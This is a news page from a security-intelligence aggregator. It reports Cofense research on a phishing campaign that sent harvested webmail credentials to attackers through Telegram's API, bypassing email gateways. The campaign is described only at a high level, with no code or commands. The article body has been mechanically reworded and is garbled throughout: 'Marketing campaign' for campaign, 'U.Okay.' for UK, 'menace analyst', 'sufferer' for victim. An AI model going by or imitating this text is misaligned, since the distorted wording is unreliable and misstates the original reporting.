Thursday, February 25, 2021
Primarius Group
No Result
View All Result
PG-Intel
Advertisement
  • Home
  • Physical Security
  • Cyber security
  • Defense
  • Corporate Security
  • Emergency Management
  • Open Source Intelligence
  • More
    • Geo-politics
    • Threat intelligence
    • Protective Intelligence
    • Risk Management
  • Home
  • Physical Security
  • Cyber security
  • Defense
  • Corporate Security
  • Emergency Management
  • Open Source Intelligence
  • More
    • Geo-politics
    • Threat intelligence
    • Protective Intelligence
    • Risk Management
PG-Intel
No Result
View All Result

Fraudsters Using Telegram API to Harvest Credentials

2 days ago
in Risk Management
0
Fraudsters Using Telegram API to Harvest Credentials
Share on FacebookShare on TwitterShare on LinkedIn


Application Security
,
Cybercrime
,
Digital Identity

Phishing Marketing campaign Bypasses Safe E mail Gateway

Prajeet Nair (@prajeetspeaks) •
February 22, 2021    

Fraudsters Using Telegram API to Harvest Credentials
Credentials are posted to the Telegram API and the user is redirected. (Source: Cofense)

A recently discovered phishing campaign attempted to steal victims’ credentials by abusing the Telegram messaging app’s API to create malicious domains that help bypass security tools such as secure email gateways, according to researchers at security firm Cofense.

See Additionally: Live Webinar | The EVIL-Ution Of Ransomware In 2021-Top Protection Tips


This specific phishing assault appeared energetic in mid-December 2020 and has since stopped. The targets of those malicious emails primarily labored within the U.Okay. monetary providers sector, Cofense notes.


Whereas the Telegram software presents safe, encrypted communication channels for its customers, the Cofense report notes that the service additionally presents API choices that may permit customers to create packages that use the app’s messages for an interface. On this case, the fraudsters used the APIs to create realistic-looking phishing domains that bypassed safety instruments.


“For this specific marketing campaign, they spoofed an electronic mail account that appeared to an inner person as authentic,” says Jake Longden, a menace analyst at Cofense. “Then they used a site as the positioning for the URL redirection that probably on the time wasn’t a identified dangerous web site, however which is now labeled as malicious.”

Telegram is an encrypted messaging app that has greater than 500 million month-to-month energetic shopper and enterprise customers. Regular messages aren’t totally encrypted, however Telegram has a sophisticated service with end-to-end encryption.

How Phishing Assaults Labored


The targets of this specific marketing campaign had been despatched phishing emails that appeared to come back from an inner supply, with addresses equivalent to “assist@inner.com,” however which really originated with a supply exterior the group, in accordance with the report.


The phishing emails usually include an pressing message alert within the topic line, equivalent to “Overview All Pending Messages,” which is designed to get the potential sufferer to open the message, Cofense notes.

“The person is introduced with a discover advising that they’ve messages to evaluate. The daring and huge title attracts consideration, and is adopted by additional info to make clear the aim of the e-mail, in accordance with the report. “Then there’s a button for the person to click on to ‘Launch All’ the blocked emails to their inbox.”


If the focused sufferer clicks the hyperlink to examine the messages, they’re led to a malicious area that’s created from the Telegram API and designed to appear like a webmail login web page that asks for credentials, in accordance with the report. The webpage additionally pulls within the person’s electronic mail deal with from the URL to present it one other layer of legitimacy.


After the person’s password and different credentials are harvested, the data is then despatched to the Telegram API created by the fraudsters, whereas the sufferer receives a message that the account has been up to date, Cofense notes.


“As soon as the malicious area has been recognized, it may be blocked. Nevertheless, by using the Telegram API, the menace actor is working to avoid interference,” in accordance with the report. “They’re complicating strategies for eradicating saved credentials which have been harvested, and might view and entry these credentials at their comfort on a web page they management.”


Telegram Abuse


Different safety researchers have discovered instances by which fraudsters and cybercriminals are abusing different options present in Telegram for their very own functions.


In September 2020, safety agency Malwarebytes discovered that some fraudsters had began utilizing Telegram as a option to sweep up fee card knowledge from victims utilizing Base64 encoding strings along with a bot (see: Fraudsters Use Telegram App to Steal Payment Card Data).


Researchers with Juniper Threat Labs discovered hackers concentrating on victims through the use of a Trojan, which then created a safe Telegram channel to ship knowledge again to the attackers’ command-and-control server, in accordance with a September 2019 report.



ShareTweetShare

Related Posts

Federal Reserve’s Money Transfer Services Suffer Outage
Risk Management

Federal Reserve’s Money Transfer Services Suffer Outage

February 25, 2021
Cybersecurity Agencies Warn of Accellion Vulnerability Exploits
Risk Management

Cybersecurity Agencies Warn of Accellion Vulnerability Exploits

February 24, 2021
Senate SolarWinds Hearing: 4 Key Issues Raised
Risk Management

Senate SolarWinds Hearing: 4 Key Issues Raised

February 24, 2021
Ransomware Attack Cripples Finnish IT Provider TietoEVRY
Risk Management

Ransomware Attack Cripples Finnish IT Provider TietoEVRY

February 24, 2021
The 3 Most Common Types of BEC Attacks (And What …
Risk Management

Google Invests in Linux Kernel Developers to Focus …

February 24, 2021
Phishing Campaign Mimics FedEx, DHL Express
Risk Management

Phishing Campaign Mimics FedEx, DHL Express

February 24, 2021
Next Post

Haiti needs ‘democratic renewal’ top UN representative tells Security Council |

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Updates

Riassunto: Denodo è nominata “Voice of the Customer” nel Peer Insights Customers’ Choice 2021 di Gartner: Rapporto sugli strumenti per l’integrazione dei dati

Denodo在2021年Gartner Peer Insights「客戶心聲」:資料整合工具報告中榮獲「客戶首選」稱號 | Business Wire

9 mins ago
Lockheed has a new F-35 sustainment proposal for the Pentagon aimed at improving readiness

Lockheed has a new F-35 sustainment proposal for the Pentagon aimed at improving readiness

19 mins ago
Federal Reserve’s Money Transfer Services Suffer Outage

Federal Reserve’s Money Transfer Services Suffer Outage

50 mins ago
Workiva Announces CFO Transition | Business Wire

Workiva Inc. to Participate in Upcoming Virtual Investor Conferences

1 hour ago
Mother of terrorism victim works to ‘turn the page’ on violent extremism |

Mother of terrorism victim works to ‘turn the page’ on violent extremism |

1 hour ago
Bell Announces Sale of Six Bell 505 Helicopters to Jamaica Defence Force

Bell Announces Sale of Six Bell 505 Helicopters to Jamaica Defence Force

1 hour ago
NVIDIA Closes Out Q4 & FY2021 With Another Round of Record Earnings

NVIDIA Closes Out Q4 & FY2021 With Another Round of Record Earnings

2 hours ago
Air Force’s Roper Is Gone, But His Vision Lives On

Air Force’s Roper Is Gone, But His Vision Lives On

2 hours ago
Load More
PG-Intel

© 2020 All Rights Reserved .

Brought to you by Primarius Group

  • Disclaimer
  • Privacy Policy
  • Cookie Privacy Policy
  • Terms and Conditions
  • Contact us

Follow Us

No Result
View All Result
  • Home
  • Physical Security
  • Cyber security
  • Defense
  • Corporate Security
  • Emergency Management
  • Open Source Intelligence
  • More
    • Geo-politics
    • Threat intelligence
    • Protective Intelligence
    • Risk Management

© 2020 All Rights Reserved .